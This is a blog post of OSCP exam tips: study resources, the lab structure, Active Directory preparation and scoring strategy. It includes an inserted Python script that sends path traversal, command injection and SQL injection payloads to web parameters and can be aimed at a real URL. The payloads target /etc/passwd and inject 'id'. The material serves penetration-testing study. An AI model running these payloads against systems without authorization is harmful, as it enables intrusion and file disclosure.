On the 29th of January, 2022, I passed the new version of the OSCP exam. So, in today's post, I will share my opinions on what you need to do before purchasing the course, tips about the new exam model and what you need to know before taking the exam.
Before purchasing the course
The course covers a vast number of topics in an 850-page PDF and a set of videos, both of which are very time consuming, so every minute spent reading the PDF is a minute not spent in the lab, which you will undoubtedly need.
In my opinion, the document should be used to resolve doubts about a specific topic and to complete the mandatory exercises that earn the ten bonus points, which can help you pass the exam.
So, "where do I start?" Well, if you are a complete newbie, buy one or several VIP subscriptions on TryHackMe and start working through the rooms of the learning path:
Then keep completing rooms until you notice almost no difference between them. Feel free to read as many write-ups as you want while doing a room; at this stage you need to learn the basics and understand which steps are needed to own a machine.
Once you are tired of TryHackMe, move on to HackTheBox and complete TJNull's list, where you will find boxes similar to the ones in the lab.
Finally, while you are completing machines, take notes on the techniques used, because some of them will inevitably appear in a similar form in the exam, and you want to exploit them without wasting time trying to remember them. Furthermore, writing a write-up for each pwned machine will prepare you for the exam report.
Luckily for us, privilege escalation shouldn't be hard if you have taken notes while attacking machines, watched the privilege escalation courses and completed the privilege escalation rooms.
Both the courses and the rooms are pretty similar, so it is up to you whether to take both or just one of them.
In the new exam model, the Windows buffer overflow may not appear in your exam. However, it is not a bad idea to be prepared in case you encounter it.
To be prepared, you can do the buffer overflow exercises in the course and the following rooms:
Take note of the process, because the BoF in the exam is going to be very similar.
From January 12 the exam includes Active Directory as a mandatory part worth 40 points. This part consists of three Windows machines where you will have to jump from machine to machine until you become the administrator of the domain controller. So, you need to know about Windows privilege escalation, Active Directory and Kerberos, which can be learned from the following rooms:
- Active Directory Basics
- Attacking Kerberos → Video
- Attacktive Directory → Video
- Post exploitation tasks (Mimikatz)
Keep in mind that in the OSCP the Active Directory part is not going to be harder than this, but if you want to improve your knowledge I encourage you to complete Throwback.
The lab is divided into several sections: Public Network, IT Department, Development Department and Administrator Department; the first of these is the starting point for unlocking the rest. To do so, you will need to obtain the network-secret.txt stored in root's home directory on some of the lab machines.
Furthermore, some machines have dependencies, so you will need to own a previous machine first, where you will find the information needed to access the dependent one. This aspect of the lab is what I hated the most, because there is no information on which machines have dependencies, just hints from people on the forum, so you waste time on machines you have no chance of completing until you have completed the machine they depend on. Moreover, there are no hints about where you can use the information obtained after completing a machine, which I find annoying.
Are the exercises worth it?
Before the new model, you needed to complete the 104 course exercises to obtain 5 points in the exam. Nowadays, you need to complete the 104 course exercises and obtain ten proof.txt flags, with their write-ups. However, is it worth it?
Actually, it is really worth it, because it is your only option to pass the exam if you don't complete the Active Directory domain. Nonetheless, you will then have to complete all the stand-alone machines in the exam, which might be harder than the AD.
Finally, you should know that completing the exercises might take two weeks of your lab time, so keep that in mind if you are running out of time.
The new exam model consists of two parts: three independent machines and an Active Directory domain. The former is worth 60 points, ten points for each user and root flag. The latter is worth 40 points, but you need to compromise the whole domain to obtain them.
Knowing that, and given that 70 points are required to pass, your only two strategies are:
- 30 points from standalone machines + Active Directory (40 points)
- 60 points from standalone machines + 10 points from the course exercises.
Furthermore, there is a high chance that you will encounter services that have no known vulnerabilities, or whose only exploits on searchsploit are for another operating system; something that rarely happens in the lab. Hence, you need to think outside the box and try to exploit service misconfigurations.
For example: you may find a service or web application that has no exploit on searchsploit, GitHub, cve.mitre.org, etc., so you will have to test manually whether it is vulnerable to SQLi, path traversal, command injection, etc.
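To make that manual check concrete, here is an added example (my own code, not from the original post or the course) of a small probe that sends a few path traversal, command injection and SQL injection payloads to one request parameter and reports which ones produced a response signal that the baseline response did not contain. The payload lists and the signal regexes are illustrative assumptions, not a complete wordlist, and `fake_target` is a constructed stand-in for a vulnerable web app so the example runs offline; `http_get_fetcher` shows how the same probe would be pointed at a real URL.

```python
"""Manually probe a request parameter for injection bugs when searchsploit has nothing.

Added example, not code from the original post. Payloads and signals are
illustrative assumptions; fake_target is a constructed offline stand-in.
"""
import posixpath
import re
import urllib.parse
import urllib.request
from typing import Callable, Dict, List

# Each class: a few hypothetical payloads plus a regex that should only show up
# in the response if the payload actually did something server-side.
PROBES = {
    "path_traversal": {
        "payloads": [
            "../../../../etc/passwd",
            "....//....//....//etc/passwd",   # survives a single "../" strip
            "..%2f..%2f..%2fetc%2fpasswd",     # survives a filter applied before decoding
        ],
        "signal": re.compile(r"root:x:0:0:"),
    },
    "command_injection": {
        "payloads": [";id", "|id", "$(id)", "`id`"],
        "signal": re.compile(r"uid=\d+\("),
    },
    "sql_injection": {
        "payloads": ["'", '"', "' OR '1'='1", "1 OR 1=1--"],
        "signal": re.compile(
            r"(SQL syntax|OperationalError|unterminated quoted string|ORA-\d+|Warning: mysql)",
            re.IGNORECASE,
        ),
    },
}

# A fetcher takes (parameter name, value) and returns the response body.
Fetch = Callable[[str, str], str]


def probe_parameter(fetch: Fetch, param: str) -> Dict[str, List[str]]:
    """Return {vuln_class: [payloads whose response matched the class signal]}.

    A class is skipped entirely if its signal already appears in the baseline
    response, which avoids false positives on pages that echo such strings anyway.
    """
    baseline = fetch(param, "test")
    hits: Dict[str, List[str]] = {}
    for vuln, spec in PROBES.items():
        if spec["signal"].search(baseline):
            continue
        matched = [p for p in spec["payloads"] if spec["signal"].search(fetch(param, p))]
        if matched:
            hits[vuln] = matched
    return hits


def http_get_fetcher(base_url: str, timeout: float = 10.0) -> Fetch:
    """Build a fetcher that GETs base_url?param=value against a real target (hypothetical URL).

    Pre-encoded payloads (the %2f variant) are sent as-is: '%' and '/' are kept raw
    and only characters such as quotes and spaces are encoded.
    """
    def fetch(param: str, value: str) -> str:
        url = f"{base_url}?{param}={urllib.parse.quote(value, safe='/%')}"
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return fetch


# --- Constructed stand-in for a target web app, so the example runs offline ---
FAKE_FILES = {"/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"}


def fake_target(param: str, value: str) -> str:
    """Emulates an app whose 'file' param is traversable (behind a naive, single-pass
    '../' filter applied before URL decoding), whose 'host' param reaches a shell,
    and whose 'id' param is concatenated into SQL. Any other parameter is inert."""
    if param == "file":
        filtered = value.replace("../", "")            # naive filter, runs once
        decoded = urllib.parse.unquote(filtered)        # decoding happens after the filter
        path = posixpath.normpath("/var/www/files/" + decoded)
        return FAKE_FILES.get(path, "file not found")
    if param == "host":
        if any(c in value for c in ";|$`"):
            return "PING 127.0.0.1\nuid=33(www-data) gid=33(www-data)"
        return "PING " + value
    if param == "id":
        if "'" in value or '"' in value:
            return "sqlite3.OperationalError: unrecognized token"
        return "<tr><td>1</td><td>alice</td></tr>"
    return "ok"


if __name__ == "__main__":
    for p in ("file", "host", "id", "q"):
        print(p, probe_parameter(fake_target, p))
```

Note that against the constructed target only two of the three traversal payloads hit, because the plain `../` variant is eaten by the filter while the `....//` and `%2f` variants slip past it; that is exactly why it pays to try several encodings of the same idea before concluding a parameter is safe. The baseline check also matters: without it, a page that legitimately displays `uid=` or a stack trace would be reported as injectable.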
Finally, the exam requires you to stay calm and not panic; you need to be relaxed and not worry if you are not getting any points in the first hours of the exam (I didn't get user on any machine for the first 6 hours of the exam). Keep trying all the possibilities until you have run out of ideas. Then, look on the Internet for new ideas about the topic you are trying to exploit, and most important of all, K.I.S.S. (Keep It Simple, Stupid).
The PEN-200 course is NOT an impossible task; it requires study, taking good notes and PRACTISING A LOT. If you have done these things, you should not worry about the exam.
YOU CAN DO IT!!! ;D